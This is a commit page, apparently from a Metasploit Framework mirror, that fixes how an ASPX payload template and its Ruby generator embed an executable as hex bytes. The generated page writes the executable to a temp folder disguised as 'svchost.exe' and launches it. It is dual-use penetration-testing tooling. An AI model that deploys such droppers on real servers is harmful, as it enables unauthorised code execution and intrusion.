infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix aspx

bug/bundler_fix
Meatballs 2013-08-23 17:09:51 +01:00
parent dd13a7e48f
commit 1cb1afa50a
2 changed files with 7 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
data/templates/scripts/to_exe_aspx.aspx.template
View File

@ -1,10 +1,10 @@
<%@ Page Language="C#" AutoEventWireup="true" %> <%%@ Page Language="C#" AutoEventWireup="true" %%>
<%@ Import Namespace="System.IO" %> <%%@ Import Namespace="System.IO" %%>
<script runat="server"> <script runat="server">
protected void Page_Load(object sender, EventArgs e) protected void Page_Load(object sender, EventArgs e)
{ {
StringBuilder %{var_file} = new StringBuilder(); StringBuilder %{var_file} = new StringBuilder();
%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}"); %{shellcode}
string %{var_tempdir} = Path.GetTempPath(); string %{var_tempdir} = Path.GetTempPath();
string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}"); string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe"); string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");

7
lib/msf/util/exe.rb
View File

@ -953,8 +953,6 @@ def self.to_vba(framework,code,opts={})
end end
def self.to_exe_aspx(exes = '', opts={}) def self.to_exe_aspx(exes = '', opts={})
exe = exes.unpack('C*')
hash_sub = {} hash_sub = {}
hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -964,7 +962,8 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:shellcode] = "" exe = exes.unpack('C*')
hash_sub[:shellcode] = "#{hash_sub[:var_file]}.Append(\"\\x#{exe[0].to_s(16)}"
1.upto(exe.length-1) do |byte| 1.upto(exe.length-1) do |byte|
# Apparently .net 1.0 has a limit of 2046 chars per line # Apparently .net 1.0 has a limit of 2046 chars per line
@ -974,6 +973,8 @@ def self.to_vba(framework,code,opts={})
hash_sub[:shellcode] << "\\x#{exe[byte].to_s(16)}" hash_sub[:shellcode] << "\\x#{exe[byte].to_s(16)}"
end end
hash_sub[:shellcode] << "\");\r\n"
return read_replace_script_template("to_exe_aspx.aspx.template", hash_sub) return read_replace_script_template("to_exe_aspx.aspx.template", hash_sub)
end end